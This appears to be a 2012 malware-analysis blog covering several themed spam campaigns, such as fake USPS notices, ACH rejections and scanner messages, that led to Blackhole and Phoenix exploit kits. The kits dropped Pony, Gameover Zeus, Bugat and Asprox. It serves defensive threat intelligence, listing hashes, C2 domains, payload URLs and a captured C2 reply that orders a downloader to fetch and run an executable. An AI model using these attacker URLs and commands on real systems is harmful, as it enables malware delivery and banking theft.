Contact to the nearest post office

On 2012-04-26 we observed a round of USPS flavored spam. We analyzed a spam message with the subject line “Contact to the nearest post office “. The full message was as follows:

Notification, 

We couldn’t deliver your parcel at your address. 

Reason deny: Postal code contains an error. 
LOCATION OF YOUR PARCEL:Des Moines 
STATUS OF YOUR ITEM: sort order 
SERVICE: Expedited Shipping 
Parcel number:U171553881 NU 
FEATURES: Yes 

The label of your parcel is enclosed to the letter. 
You should print the label and show it in the nearest post office to 
get a parcel. 

Important information! 
If the parcel isn’t received within 30 working days our company will 
have the right to claim compensation from you for it’s keeping in the 
amount of $12.28 for each day of keeping of it. 

You can find the information about the procedure and conditions of 
parcels keeping in the nearest office. 

Thank you for attention. 
USPS Express Services. 

Attached to this spam was the following zip archive:

File: Label_Parcel_USPS.NR_213-7004.zip
Size: 24725
MD5: 21464652804DE3916D755C75286AD5C4

This zip archive contained the following malicious downloader:

File: Label_Parcel.exe
Size: 26112
MD5: B37B8B306E9D2C1EEED0FB71C32E1657

This downloader was installed on the victim filesystem in the following location C:\Documents and Settings\Administrator\Local Settings\Application Data\urlmon.exe.

This downloader sent the following GET request to a control server at  everkosmo2012.ru:

GET /ab/index.php?r=gate&id=d0ef7554&group=24.04.2012_a&debug=0 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: everkosmo2012.ru

The control server returned the following response:

HTTP/1.1 200 OK
Server: nginx/1.1.19
Date: Thu, 26 Apr 2012 12:52:08 GMT
Content-Type: text/html
Content-Length: 44
Connection: keep-alive
X-Powered-By: PHP/5.3.3-7+squeeze8
Vary: Accept-Encoding

run=http://www.baracademie.ca/_notes/ddd.exe

The downloader parsed the run= command and then downloaded the following executable from http://www.baracademie.ca/_notes/ddd.exe:

File: ddd.exe
Size: 579586
MD5: C64A7822CBF2EBA42D911B4F9E7C5D78

This executable is the same type of Office document stealer previously discussed in our American Airlines Ticket Attachment post. This Office document stealer variant POSTs stolen documents to everkosmo2012.ru over port 8000.

The initial downloader then sent a second GET request to the control server at everkosmo2012.ru. The control server responded, instructing the downloader to grab a secondary malware executable from http://www.baracademie.ca/_notes/mmm.exe. This executable was an Asprox spambot. It had the following properties:

File: mmm.exe
Size: 237056
MD5: 650912C5F2763F55196616B76D880CAD

This Asprox spambot retrieved its configuration file via the following POST request to a control server at illinoisnot.ru:

POST /wet.php HTTP/1.1
Host: illinoisnot.ru:80
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 6.1; SV1; .NET CLR 1.1.4777)
Accept: */*
Accept-Language: en-gb
Accept-Encoding: deflate
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 746

The configuration file included a spam template to be used in spamming operations. The downloaded spam template was as follows:

Message-ID: <%%MSGID%%>
From: %%FROM%%
To: <%%RCPT%%>
Subject: %%SUBJ%%
Date: %%DATE%%
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary=”%%BND:1%%”
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2900.2180
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2180

The configuration file instructed the Asprox bot to spam additional USPS-themed messages.

We noted that the domain illinoisnot.ru resolved to 81.17.24.72. This IP previously hosted other suspect domains including:

  • luxas87612.ru
  • bristol1883314.ru
  • equator991534.ru
  • ocean8838354.ru
  • chukchi293494.ru
  • chart71445.ru
  • chart71445.ru
  • kiribati23547.ru
  • united55658.ru
  • surero14568.ru
  • virific2012b.ru

We know that at least the bristol1883314.ru domain hosted a Smoke Loader control server.

Careerbuilder spam….again

Back in March, we wrote about a Careerbuilder spam that was used to drop a Gameover Zeus payload.  It turns out that today, we are seeing an identical spam message dropping not a Gameover Zeus payload, but Bugat.

The body of the spam messages are similar to the following:

Hello,

I am a customer service employee at CareerBuilder. I found a vacant position at Security Finance Corporation that you may be interested in based on information from your resume or a recent online submission you made on our site. You can review the position on the CareerBuilder site here:

Chief Business Development Officer

Best wishes in your job search !

Gretchen
Careerbuilder Customer Service Team
CareerBuilder ,5550-A Peachtree Parkway , Norcross, GA 30092

If you compare the text of this spam to the one we saw in March, you will see they are almost identical except for a few of the words such as the ‘company’ with the open position and the ‘Careerbuilder Customer Service’ team members name.

While the emails utilize several different hyperlink URLs to redirect the victims to an exploit kit, each of these various URLs seems to end in ‘car.html.’

The car.html pages redirect to a Black hole exploit kit at masterinsland[.]net/main.php?page=975982764ed58ec3.  This domain is hosted at IP address 70.32.97.205.  The kit drops the payload via masterisland[.]net/w.php?f=58e0f&e=0.  The Bugat payload has the following properties:

MD5: 518648694d3cb7000db916d930adeaaf
File Size:  62,464 bytes
Description: G Data AntiVirus

This variant utilizes the following C&C’s:

zorberzorberzu[.]ru/mev/in/
internetsexcuritee4dummies[.]ru/mev/in/
prakticalcex[.]ru/mev/in/
nalezivmordu[.]in/mev/in/

So, the question here is, is there any connection between the actor installing the March Gameover Zeus payload and the actor installing the current Bugat payload?  Or is this merely a shared/copied spam template?  Personally, Im betting there is far more overlap than a copied spam template.  We’d love to hear other opinions on this as well.

ACH Transfer Rejected

We analyzed following malicious URL which is used in ACH spam on April 25 2012:

hxxp://ft000267.ferozo.com/HbusWmxz/index.html

ACH Transfer rejected

This malicious page contained 4 javascripts as shown below:

<script type=”text/javascript” src=”hxxp://crowclub.ca/nRDnUrDq/js.js”></script>
<script type=”text/javascript” src=”hxxp://zadar.hr/aAyhw3ey/js.js”></script>
<script type=”text/javascript” src=”hxxp://giupban24h.com/v3NcYEV4/js.js”></script>
<script type=”text/javascript” src=”hxxp://pacilg.org/RaQhf32L/js.js”></script>

Eventually these malicious JS redirects victim to a Blackhole Exploit kit at hxxp://216.119.142.235/showthread.php?t=34c79594e8b8ac0f

BlackHole kit first droppes Pony from the following location:

hxxp://216.119.142.235/q.php?f=2fcad&e=2
File: contacts.exe
MD5: 242e28a23fbea9dc1e1939eea326a0d2
Size: 1,10,176 bytes

Pony downloader posts to its dropzone at 91.121.84.204/pony/gate.php. It was also configured to download 2 identical Gameover Zeus payloads from following locations:

1. hxxp://power-tec.sk/D8aoPu86/XPVqAGE.exe
2. hxxp://valuemerge.com/aXS0mRNT/KXj.exe

Gameover was installed in %APPDATA%\Ucnye\azufyv.exe

MD5: 647c62cd30f6fb4ea00e8829359b0a82
Size: 2,74,016 bytes
Timestamp: 2010:11:03 14:49:13+01:00
Signature: This file is digitally signed by ‘tNzquyHloA4n3FFctsvudWw7x’
Certificate Validity: 04/24/2012 to 01/01/2040

This Gameover Zeus variant posts to a dropzone at 89.44.245.126:17711. Webinjects were downloaded from 64.60.155.138:21835. The Gameover variant had a botid of “mf222a25″ and cid of “3005″.

Fwd: Scan from a Hewlett-Packard ScanJet #468974

We analyzed following malicious URLs which are used in HP Scan spams:

hxxp://eksitonas.lt/KzHz5BzZ/index.html
hxxp://casagustosa.gr/zo799HVs/index.html

This malicious page contained 3 javascripts as shown below

hxxp://yasonrafilm.com/ZAsUDjH1/js.js
hxxp://lsdkft.hu/bC1BxCbJ/js.js
hxxp://www.aafaq.ca/sxuvf5jV/js.js

Eventually these malicious JS redirects victim to a Blackhole Exploit kit at hxxp://208.117.43.8/showthread.php?t=34c79594e8b8ac0f

BlackHole kit first droppes Pony from the following location:

hxxp://208.117.43.8/q.php?f=2fcad&e=2
File: about.exe
MD5: 9b196853650fcb8ac182be05b627f07c
Size: 1,10,688 bytes

Pony downloader posts to its dropzone at 91.121.84.204/pony/gate.php. It was also configured to download 4 identical Gameover Zeus payloads from following locations:

1. hxxp://power-tec.sk/D8aoPu86/XPVqAGE.exe
2. hxxp://synergieassurance.com/AnJVfWxx/aFa.exe
3. hxxp://20272.w72.wedos.net/w7y74z3H/Hzt.exe
4. hxxp://electrosa.com/8zvW2XE.exe

Gameover was installed in %APPDATA%\Ociw\ilji.exe

MD5: 80bd579d484ac4742b75952fb1a2d694
Size: 2,74,016 bytes
Timestamp: 2010:11:03 04:51:09+01:00
Signature: This file is digitally signed by ‘tNzquyHloA4n3FFctsvudWw7x’
Certificate Validity: 04/24/2012 to 01/01/2040

This Gameover Zeus variant posts to a dropzone at 86.35.218.231:17554. Webinjects were downloaded from 189.78.203.103:29161. The Gameover variant had a botid of “MF222a24″ and cid of “3005″.

IRS spams

We analyzed following malicious URLs which we believe are used in IRS spams:

hxxp://9×18.com/1FrYnHUV/index.html
hxxp://9×18.com/6GkXis2t/index.html
hxxp://9×18.com/7zSj5u8N/index.html
hxxp://9×18.com/9sfGpVaP/index.html
hxxp://9×18.com/DcXTY95c/index.html
hxxp://9×18.com/EdVTFHRy/index.html
hxxp://9×18.com/H37jjL6S/index.html
hxxp://9×18.com/JLdSGm4e/index.html
hxxp://9×18.com/KirxGAkT/index.html
hxxp://9×18.com/M7vrQsUT/index.html
hxxp://9×18.com/N7kkDdho/index.html
hxxp://9×18.com/U8nC5QAL/index.html
hxxp://9×18.com/Y1aFsgBk/index.html
hxxp://9×18.com/bFdJryZB/index.html
hxxp://9×18.com/igc6smeH/index.html
hxxp://9×18.com/jUyLton1/index.html
hxxp://9×18.com/pHbH0hzY/index.html
hxxp://9×18.com/rPWsV1Cp/index.html
hxxp://9×18.com/tjUQVqbC/index.html
hxxp://beinsync.in/1FrYnHUV/index.html
hxxp://9×18.com/wVKshGdP/index.html
hxxp://beinsync.in/6GkXis2t/index.html
hxxp://alcopaz.com/1FrYnHUV/index.html
hxxp://beinsync.in/7zSj5u8N/index.html
hxxp://alcopaz.com/6GkXis2t/index.html
hxxp://beinsync.in/9sfGpVaP/index.html

Although 9×18.com was restricting these URL access, other malicious URLs were up and serving the purpose redirecting victim to Blackhole exploit kit through following 3 javascripts:

<script type=”text/javascript” src=”hxxp://anydemo.in/ox8rWBHG/js.js”></script>
<script type=”text/javascript” src=”hxxp://Darsshan.com/8n9SXXoy/js.js”></script>
<script type=”text/javascript” src=”hxxp://www.moverpackermart.com/3F634op7/js.js”></script>

Blackhole kit was running at hxxp://85.25.189.174/showthread.php?t=34c79594e8b8ac0f. It first drops Pony downloader from the following location:

hxxp://85.25.189.174/q.php?f=2fcad&e=2
File: info.exe
MD5: 9b196853650fcb8ac182be05b627f07c
Size: 1,31,168 bytes

Pony downloader posts to its dropzone at 91.121.84.204/pony/gate.php. It was also configured to download 3 identical Gameover Zeus payloads from following locations:

1. hxxp://electrosa.com/8zvW2XE.exe
2. hxxp://arteyciencia.es/AUq5p7Sm/4VLks.exe
3. hxxp://hotelsatmatheran.com/0Pvo9Hnu/EpJbWNWD.exe
4. hxxp://poetesa.ro/0SbvQR5X/5op0.exe

Gameover was installed in %APPDATA%\Enze\izvuo.exe

MD5: 4105a615d658d89e836c125844be5f39
Size: 3,41,600 bytes
Timestamp: 2010:10:31 08:13:32+01:00
Payload Build Time: 2012-04-16 03:12:58

This Gameover Zeus variant posts to a dropzone at 86.124.117.250:16824. Webinjects were downloaded from 125.166.213.114:25137. The Gameover variant had a botid of “MF222a20″ and cid of “5555″.

As we have been nothing here, Pony Downloader and Gameover Zeus both payloads share same properties indicating both these payloads were built by same group/people, around same time(?):

Signature: Digitally signed by ‘wU5sF34khy4k0DMt30RspNOOm’
Certificate Validity: 04/20/2012 to 01/01/2040
Company Name: Microsoft Corporation
File Description: Windows Disk Diagnostic User Resolver
File Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Internal Name: DFDWiz.exe
Legal Copyright: © Microsoft Corporation. All rights reserved.
Original Filename: DFDWiz.exe
Product Name: Microsoft® Windows® Operating System
Product Version: 6.1.7600.16385

ACH Transaction Rejected

The samples we analyzed had a link to a malicious page at hxxp://cayambeturismo.gob.ec/zHyxgRft/index.html & hxxp://doctors.eyes.org/a6qYbbvX/index.html

ACH transaction rejected

This malicious page contained javascript that redirected victims to a Blackhole Exploit kit at

hxxp://85.25.189.174/showthread.php?t=34c79594e8b8ac0f

BlackHole kit first droppes Pony from the following location:

hxxp://85.25.189.174/q.php?f=2fcad&e=2
File: about.exe
MD5: 9b196853650fcb8ac182be05b627f07c
Size: 1,31,168 bytes

Pony downloader posts to its dropzone at 91.121.84.204/pony/gate.php. It was also configured to download 3 identical Gameover Zeus payloads from following locations:

1. hxxp://electrosa.com/8zvW2XE.exe
2. hxxp://arteyciencia.es/AUq5p7Sm/4VLks.exe
3. hxxp://electrosa.com/8zvW2XE.exe
4. hxxp://poetesa.ro/0SbvQR5X/5op0.exe

Gameover was installed in %APPDATA%\Yblaa\duoju.exe

MD5: a898d910ac17e2dc00333a410daeaa68
Size: 3,47,744 bytes
Timestamp: 2010:10:28 19:52:20+02:00

This Gameover Zeus variant posts to a dropzone at 190.200.120.150:17663. Webinjects were downloaded from 210.4.72.124:13525. The Gameover variant had a botid of “mf222a20″ and cid of “5555″.

Again, as noted in past few days Pony Downloader and Gameover Zeus both shared same properties:

Signature: Digitally signed by ‘wU5sF34khy4k0DMt30RspNOOm’
Certificate Validity: 04/20/2012 to 01/01/2040
Company Name: Microsoft Corporation
File Description: Windows Disk Diagnostic User Resolver
File Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Internal Name: DFDWiz.exe
Legal Copyright: © Microsoft Corporation. All rights reserved.
Original Filename: DFDWiz.exe
Product Name: Microsoft® Windows® Operating System
Product Version: 6.1.7600.16385

Scan from a Xerox WorkCentre Pro #315614

The sample we analyzed had a link to a malicious page at http://shopdreambags.com/FD6YBhNw/index.html

Scan from Xerox 315614

This malicious page contained javascript that redirected victims to a Blackhole Exploit kit at

hxxp://184.22.115.24/showthread.php?t=34c79594e8b8ac0f

BlackHole kit first droppes Pony from the following location:

hxxp://184.22.115.24/q.php?f=2fcad&e=2
File: contacts.exe
MD5: ce1e4177bb2605a8637e386c6f7ab737
Size: 1,29,632 bytes

Pony downloader posts to its dropzone at 200.72.183.54//pony/gate.php. It was also configured to download 3 identical Gameover Zeus payloads from following locations:

1. hxxp://poetesa.ro/0SbvQR5X/5op0.exe
2. hxxp://arteyciencia.es/AUq5p7Sm/4VLks.exe
3. hxxp://redman.com.br/zqDQMaNF/SRivXt.exe

Gameover was installed in %APPDATA%\Jysah\gaihyl.exe

MD5: a898d910ac17e2dc00333a410daeaa68
Size: 3,47,744 bytes
Timestamp: 2010:10:31 04:27:18+01:00

This Gameover Zeus variant posts to a dropzone at 187.105.228.200:11752. Webinjects were downloaded from 71.80.237.121:14268. The Gameover variant had a botid of “MF222a19″ and cid of “5555″.

Interestingly, Pony Downloader and Gameover Zeus both shared same properties indicating both these payloads were built by same group/people, around same time(?):

Signature: Digitally signed by ‘VfnHcYKXDLnVlQizT9uLI4yhP’
Certificate Validity: 04/18/2012 to 01/01/2040
Company Name: Microsoft Corporation
File Description: Windows Disk Diagnostic User Resolver
File Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Internal Name: DFDWiz.exe
Legal Copyright: © Microsoft Corporation. All rights reserved.
Original Filename: DFDWiz.exe
Product Name: Microsoft® Windows® Operating System
Product Version: 6.1.7600.16385

VALERIO Pizza Order Confirmation

Order Confirmation

The sample we analyzed had a link to a malicious page at hxxp://printingcheaper.com/page1.htm?XVUU=S1KGEAGODJ8XNNAHB48IE5UHL&ZELSDVH=J0VL2BFPNUITV68G6&ID5TU3=UA0MLSUW5R2R8GC&DT9=MXK3SEKG0JMHDAU0RZAG6P3K&4S0W2E=8MG1P4S5IGNJAPNX87C&G4YO6P6=AEPEC1D5PXXZ&CS66A7F=RNK4RSELG796VIEX0TUYQ8F9&877R2=VGZBG625JCT8Z9O2K&KQA05=5L5TW1IP247&

This malicious page contained javascript that redirected victims to a Phoenix Exploit kit at hxxp://uiwewsecondary.ru:8080/internet/fpkrerflfvd.php
Phoenix kit first drops a CVE-2010-0188 PDF payload from hxxp://uiwewsecondary.ru:8080/internet/kqbzaubpiqxnbn.pdf. PDF file had following properties:

File: kqbzaubpiqxnbn.pdf
MD5: 1b6f367a28de927e6573e803e555a297
Size: 13,163 bytes

Successful exploit in turn handed victims off to second exploit kit at hxxp://poluicenotgo.ru:8080/internet/at.php?i=15. This kit dropped a Pony downloader with following properties:

File: esfwatkocliuyn.exe
MD5: 5726463108bb6f26e6dd54763e85453b
Size: 1,35,264 bytes

Both these phoenix exploit kits are hosted at the following IP addresses on a same fast flux infrastructure:

83.170.91.152
85.214.204.32
88.190.22.72
89.31.145.154
112.78.124.115
125.19.103.198
41.168.5.140
62.85.27.129
173.203.211.157
210.56.23.100
211.44.250.173
216.24.197.66
219.94.194.138

Pony downloader posts to its dropzone at hxxp://dare2dreamz.com/pony/gate.php, hosted at IP address 109.206.180.54. It was also configured to download 3 identical Gameover Zeus payloads from following locations:

1. hxxp://dynolite.eu/7U0ASvP9/AZz.exe
2. hxxp://abbott.u4ria.co.za/HGFg1RHz/MkiZMX.exe
3. hxxp://demircioglubilgisayar.com.tr/qy3kMMxv/VgWqQm4k.exe

Gameover was installed in %APPDATA%\Meizo\ehgea.exe

MD5: a3e56f7ba6cd98b2ac87596daf74e2aa
Size: 3,71,808 bytes
Timestamp: 2010:10:29 14:08:06+02:00

This Gameover Zeus variant posts to a dropzone at 211.73.186.159:28813. Webinjects were downloaded from 76.73.52.11:25362. The Gameover variant had a botid of “MF222a17” and cid of “5555”.

Interestingly, Pony Downloader and Gameover Zeus both shared same properties indicating both these payloads were built by same group/people, around same time(?):

Signature: Digitally signed by ‘VfnHcYKXDLnVlQizT9uLI4yhP’
Certificate Validity: 04/16/2012 to 01/01/2040
Company Name: Microsoft Corporation
File Description: Windows Disk Diagnostic User Resolver
File Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Internal Name: DFDWiz.exe
Legal Copyright: © Microsoft Corporation. All rights reserved.
Original Filename: DFDWiz.exe
Product Name: Microsoft® Windows® Operating System
Product Version: 6.1.7600.16385

NY TRAFFIC TICKET

Malicious URL:
hxxp://partyinthepark.co.za/page4.htm?563H0J=7J7WVK3SIM15NMTA5&SGLU=GPRI34KVG4J9QB&VNOP=DY7VUBIXD4WT&5LEPGN=4IWARW2MUHFT&

NY Traffic Ticket

The text “To Plead Click Here” in spam contained malicious hyperlink which eventually redirects victim to a Phoenix Exploit kit at hxxp://vitalitysomer.ru:8080/pages/glavctkoasjtct.php.

This phoenix kit is hosted at the following IP addresses on a fast flux infrastructure:

83.170.91.152
85.214.204.32
88.190.22.72
89.31.145.154
112.78.124.115
125.19.103.198
41.168.5.140
62.85.27.129
219.94.194.138
210.56.23.100
211.44.250.173

Phoenix controller drops a CVE-2010-0188 PDF exploit from hxxp://vitalitysomer.ru:8080/pages/jnapaqjrezbpj8.pdf. PDF file had following properties:

File: jnapaqjrezbpj8.pdf
MD5: 73a3d52244f68a2eb4254be2f9e9d740
Size: 13,151 bytes

Successful exploit drops a pony downloader on victim machine. This Pony Downloader is downloaded on another Phoenix exploit-kit at hxxp://validatoronmee.ru:8080/pages/dq.php?i=15. This kit is hosted at the same FastFlux infrastructure as vitalitysomer.ru. Pony downloader had following properties:

File: duczdzd.exe
MD5: 392a574415aa24efbb1f7eda3564060d
Size: 1,40,840 bytes
Timestamp: 2012:04:13 23:48:26+02:00

Pony downloader beacons to its dropzone at buyandsmile.atomclick.co/pony/gate.php. It was also configured to download 3 identical Gameover Zeus payloads from following places:

1. avrupamodaevi.com/Rp076wCE/JVB0dU2.exe
2. guidobruscia.it/aPRh4MrM/j0Bxm4C.exe
3. 20rueraspail.be/pBBJkPFK/PwpKbEJm.exe

Gameover installes in %APPDATA%\Wievo\myaxu.exe

MD5: 5210005536c9f3bbcda0149da4ff37c8
Size: 3,13,384 bytes
Timestamp: 2010:11:01 22:21:42+01:00

This Gameover Zeus variant posts to a dropzone at 76.113.104.21:26928, 178.235.0.255:16270. Webinjects were downloaded from 46.35.131.65:20177 & 116.203.3.213:28542. The Gameover variant had a BotID “mf222a15” and CID “2222”.

Interestingly, Pony Downloader and Gameover Zeus both shared same properties indicating both these payloads were built by same group/people, around same time.

Signature: This file is digitally signed by ‘gvpQYV0qr00yndP’
Certificate Validity: 04/13/2012 to 01/01/2040
Company Name: Microsoft Corporation
File Description: Windows Disk Diagnostic User Resolver
File Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Internal Name: DFDWiz.exe
Legal Copyright: © Microsoft Corporation. All rights reserved.
Original Filename: DFDWiz.exe
Product Name: Microsoft® Windows® Operating System
Product Version: 6.1.7600.16385

Confirm your US airways online reservation

On 2011-04-09 we observed an interesting round of US Airways spam. The sample we analyzed had a subject line of “Confirm your US airways online reservation”.

While this same template had been previously used in high-profile Gameover Zeus laden spam campaigns, this particular campaign was a bit different. The sample we analyzed had a link to a malicious page at go2gamers.com/us.html. Other spam samples from the same campaign had links to hacked websites with malicious us.html pages.

The malicious us.html page contained javascript that redirected victims to a Blackhole Exploit Kit at bamboozlefitclub.net/main.php?page=745b81e2608709b2.  The bamboozlefitclub.net domain resolved to 85.189.11.134.

This Blackhole kit dropped a Bugat* payload with the following properties:

File: about.exe
Size: 71680
MD5: D1455B0C28A145C5D207F276F945ABCA

Unlike other Bugat payloads that weve documented here that used a domain generation algorithm to determine its command and control server, this variant was hardcoded to connect to 4 domains for command and control instructions. This variant was configured to connect to the following:

scanforsecurytyholes.ru
testnosecurity.ru
securytycheckme.ru
krjjfgzzzooooem.ru

The scanforsecurytyholes.ru and securytycheckme.ru are currently offline. The other domains 91.201.4.142. After this variant successfully connected to the first available command and control server, in this case testnosecurity.ru/mev/in, it downloaded a configuration file that included a target list of over 400 websites. The vast majority of these targets were financial institutions. If youd like a copy of the target list hit us up at spamalysis@gmail.com.

The downloaded configuration file also revealed the location of the the domains hosting web injects. Bugat, and other banking malware, use web injects to dynamicly man-in-the-middle a victims online banking session. Basically, when a victim logs into their bank’s website these web injects will take control of their session and steal the victim’s banking information in real-time. The webinjects used by this Bugat variant were pulled from http://lavonoplanet.ru/mev/in/cp.php. The domain lavonoplanet.ru resolved to 91.201.4.142.

In addition to providing a configuration file, the command and control server at testnosecurity.ru also pushed a Bugat update on its victims. This updated Bugat payload had the following properties:

Size: 75271
MD5: 0386F4D83DD84D2F60352E00D3F504A6

This updated variant was configured to connect to the following command and control servers:

securytycheckme.ru
sexnotincity.ru

The domain securytycheckme.ru was offline, but the domain sexnotincity.ru resolved to 91.201.4.143. It seems like these guys like to host their domains in the same neighborhood. Mental note … stay out this /24.

The updated Bugat variant pulled its webinjects from the following domains:

http://gloogle.in/mev/in/cp.php
https://meredianstatserv.com/aqweb/in.php

We apologize for not reporting on this one sooner but unfortunately our real lives got in the way this week.

* note, what we call Bugat others call Feodo or Cridex.